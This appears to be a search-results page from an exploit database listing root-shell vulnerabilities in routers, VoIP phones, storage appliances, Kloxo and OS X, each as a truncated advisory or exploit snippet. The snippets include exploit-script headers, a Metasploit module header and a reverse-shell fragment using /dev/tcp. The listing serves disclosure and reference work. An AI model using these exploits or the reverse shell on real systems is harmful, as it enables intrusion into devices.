969 matches found
TRENDnet Shell
Added: 06/24/2014 Background TRENDnet routers are vulnerable to a range of SQL injection, command injection, and buffer overflow vulnerabilities. Current supported devices include: TEW-654TR - Remote Root Shell TEW-732BR - Remote Root Shell Problem A SQL injection vulnerability allows the attacke...
TRENDnet Shell
Added: 06/24/2014 Background TRENDnet routers are vulnerable to a range of SQL injection, command injection, and buffer overflow vulnerabilities. Current supported devices include: TEW-654TR - Remote Root Shell TEW-732BR - Remote Root Shell Problem A SQL injection vulnerability allows the attacke...
CVE-2013-6876 s3dvt Root shell
CVE-2013-6876 s3dvt Root shell About s3dvt: s3dvt is part of the 3d network display server which can be used as 3d desktop environment. Vulnerability: A vulnerability in s3dvt for versions prior to 0.2.2 allows to obtain a root shell. Details, patches, discussion and strategy to exploit at:...
Yealink VoIP Phone SIP-T38G - Privilege Escalation
Yealink VoIP Phone SIP-T38G - Privilege Escalation Title: Yealink VoIP Phone SIP-T38G Privileges Escalation Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5759 Description: Using the fact...
Yealink VoIP Phone SIP-T38G Privilege Escalation
Title: Yealink VoIP Phone SIP-T38G Privileges Escalation Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team Vendor Homepage: http://www.yealink.com/Companyprofile.aspx Version: VoIP Phone SIP-T38G CVE: CVE-2013-5759 Description: Using the fact that cgiServer.exx run under the root privileges we...
HP StoreVirtual Storage Remote Unauthorized Access
The remote HP storage system running LeftHand OS has an SSH support backdoor mechanism built in that may allow a remote attacker to gain root shell access to the system. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid73461; scriptversion"2.4"; scriptcvsdate"Date:...
Quantum vmPRO后门未授权访问漏洞
Bugtraq ID:66274 Quantum vmPRO是一款适用于保护虚拟机数据的解决方案。 Quantum vmPRO "/usr/local/pancetera/bin/cmdprocessor.py"存在一个隐藏命令可获得root shell,允许通过验证的远程攻击者利用漏洞提交恶意命令获得root shell。 0 Quantum vmPRO 3.1.2 Quantum vmPRO 2.3.0.1已经修复该漏洞,建议用户下载更新: http://quantum.com/...
Quantum vmPRO 3.1.2 - Local Privilege Escalation
----------- Author: ----------- xistence ------------------------- Affected products: ------------------------- Quantum vmPRO 3.1.2 and below ------------------------- Affected vendors: ------------------------- Quantum http://quantum.com/ ------------------------- Product description:...
Quantum DXi V1000 2.2.1 - Static SSH Key
Quantum DXi® V-Series is a virtual deduplication backup appliance that protects physical and virtual data across remote sites, the datacenter and cloud deployments. Details: ---------- 0x01 - Default root user The root user has a hardcoded password that is unknown and not changeable. Normally...
Quantum DXi V1000 2.2.1 - Static SSH Key
Quantum DXi V1000 2.2.1 - Static SSH Key ----------- Author: ----------- xistence ------------------------- Affected products: ------------------------- Quantum DXi V1000 2.2.1 and below ------------------------- Affected vendors: ------------------------- Quantum http://quantum.com/...
Quantum vmPRO - Backdoor Command (Metasploit)
This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'net/ssh' class Metasploit3 "Quantum vmPRO Backdoor Command", 'Description' = %q This module abuses a backdoor command in vmPRO 3.1.2. Any user,...
Quantum vmPRO 3.1.2 Root Shell
----------- Author: ----------- xistence ------------------------- Affected products: ------------------------- Quantum vmPRO 3.1.2 and below ------------------------- Affected vendors: ------------------------- Quantum http://quantum.com/ ------------------------- Product description:...
Kloxo Remote Root Exploit
Kloxo remote root exploit that leverages a blind SQL injection and injects a perl connect back shell /bin/sh with root privilege. !/usr/bin/perl Title: Kloxo remote root exploit Author: Simo Ben youssef Contact: SimoatMorxploitcom Coded: 28 January 2014 Published: 26 February 2014 MorXploit...
Security Advisory: NETGEAR Router D6300B Firmware: V1.0.0.14_1.0.14
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory ID: SYSS-2013-001 Product: NETGEAR Router D6300B / Firmware: V1.0.0.141.0.14 latest Vendor: Netgear Affected Versions: until V1.0.0.141.0.14 latest Tested Versions: V1.0.0.141.0.14 latest Vulnerability Type: Root-Shell, OS Command Injection,...
Netgear D6300B Command Injection / Misconfiguration
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory ID: SYSS-2013-001 Product: NETGEAR Router D6300B / Firmware: V1.0.0.141.0.14 latest Vendor: Netgear Affected Versions: until V1.0.0.141.0.14 latest Tested Versions: V1.0.0.141.0.14 latest Vulnerability Type: Root-Shell, OS Command Injection,...
ASUS RT-N56U Remote Root
!/usr/bin/env python from time import sleep from sys import exit import urllib2, signal, struct, base64, socket, ssl Title: ASUS RT-N56U Remote Root Shell Exploit - appsname Discovered and Reported: October 2013 Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE Contact: Twitt...
D-Link DSR Router Series - Remote Command Execution
!/usr/bin/python CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution Vulnerable Routers: D-Link DSR-150 Firmware v1.08B44 D-Link DSR-150N Firmware v1.05B64 D-Link DSR-250 and DSR-250N Firmware v1.08B44 D-Link DSR-500 and...
OSX <= 10.8.4 - Local Root Priv Escalation (py)
Exploit for iOS platform in category local exploits !/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s...
Mac OS X 10.8.4 Local Privilege Escalation
!/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port...
ASUS RT-AC66U acsd Param - Remote Root Shell Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python import signal, struct from time import sleep from socket import from sys import exit, excinfo TitleASUS RT-AC66U Remote Root Shell Exploit - acsd param command Discovered and ReportedJune 2013 Discovered/Exploited...